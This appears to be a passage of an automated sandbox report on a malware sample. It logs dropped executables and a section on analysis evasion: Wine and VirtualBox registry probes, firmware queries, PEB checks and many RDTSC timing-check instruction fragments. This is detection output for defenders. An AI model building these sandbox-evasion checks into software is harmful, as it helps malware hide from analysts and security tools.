Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4F8C1 second address: A4F8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4F8C6 second address: A4F8CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8A44 second address: BB8A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F0F34BEC159h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC96DF second address: BC9701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F345319E6h 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9701 second address: BC9705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC997B second address: BC9981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9981 second address: BC9985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9985 second address: BC99A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319EDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F0F345319F9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9AE3 second address: BC9AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9AE9 second address: BC9AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9D54 second address: BC9D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9D5F second address: BC9D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9D65 second address: BC9D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9E95 second address: BC9ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F9h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jng 00007F0F345319EAh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0F345319F4h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9ED8 second address: BC9EF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCCF8D second address: BCCF92 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCCF92 second address: BCCFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F0F34BEC14Bh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCCFAF second address: BCCFBC instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F345319E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCCFF7 second address: BCCFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD174 second address: BCD198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319EBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD198 second address: BCD209 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 6603B300h 0x0000000e mov edx, dword ptr [ebp+122D1CE1h] 0x00000014 jmp 00007F0F34BEC14Fh 0x00000019 push 00000003h 0x0000001b mov ecx, dword ptr [ebp+122D3DDCh] 0x00000021 push 00000000h 0x00000023 and edx, 72EB46EEh 0x00000029 push 00000003h 0x0000002b jmp 00007F0F34BEC157h 0x00000030 push 6887205Fh 0x00000035 js 00007F0F34BEC16Eh 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F0F34BEC158h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD209 second address: BCD27C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5778DFA1h 0x00000010 push ebx 0x00000011 mov ecx, dword ptr [ebp+122D3E44h] 0x00000017 pop edi 0x00000018 push eax 0x00000019 mov edx, dword ptr [ebp+122D3DACh] 0x0000001f pop ecx 0x00000020 lea ebx, dword ptr [ebp+12451E5Fh] 0x00000026 jmp 00007F0F345319F2h 0x0000002b mov esi, dword ptr [ebp+122D39CCh] 0x00000031 xchg eax, ebx 0x00000032 jmp 00007F0F345319F9h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b js 00007F0F345319E6h 0x00000041 jmp 00007F0F345319EBh 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD27C second address: BCD286 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC14Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD35F second address: BCD3BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0F345319E8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D1CDCh], ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F0F345319E8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 xor dword ptr [ebp+122D263Dh], eax 0x0000004a push 5D5FCE2Fh 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD3BC second address: BCD3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD3C0 second address: BCD3C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BED3D3 second address: BED419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0F34BEC157h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F0F34BEC148h 0x00000017 js 00007F0F34BEC14Ch 0x0000001d je 00007F0F34BEC146h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB304 second address: BEB32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319EFh 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F0F345319ECh 0x00000010 jbe 00007F0F345319E6h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB479 second address: BEB47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB47E second address: BEB48C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F345319E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD51 second address: BEBD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0F34BEC146h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0F34BEC151h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD6F second address: BEBD75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD75 second address: BEBD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD7B second address: BEBD80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD80 second address: BEBD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBD86 second address: BEBD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F345319EAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC193 second address: BEC19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5457 second address: BB5467 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F345319EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA41 second address: BECA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA47 second address: BECA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA60 second address: BECA64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA64 second address: BECA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA78 second address: BECA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA7C second address: BECA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECA84 second address: BECAA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC154h 0x00000007 pushad 0x00000008 jmp 00007F0F34BEC14Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECAA8 second address: BECAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECC1B second address: BECC2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC14Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECF68 second address: BECF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECF6C second address: BECF73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BED24C second address: BED250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BED250 second address: BED258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BED258 second address: BED281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F0F345319EEh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE87F second address: BEE885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE885 second address: BEE889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE889 second address: BEE88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEE88D second address: BEE8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0F345319E8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF175E second address: BF1762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF1762 second address: BF1766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF811A second address: BF8124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0F34BEC146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8124 second address: BF812A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF812A second address: BF8130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF8130 second address: BF8137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7842 second address: BF7857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC150h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF79CA second address: BF79D4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F345319E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7CAA second address: BF7CCB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC163h 0x00000008 jmp 00007F0F34BEC157h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7F99 second address: BF7FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFABC6 second address: BFABD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0F34BEC146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFABD1 second address: BFABE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F0F345319ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB0B2 second address: BFB0B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB19C second address: BFB1A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0F345319E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB671 second address: BFB676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC07C second address: BFC080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
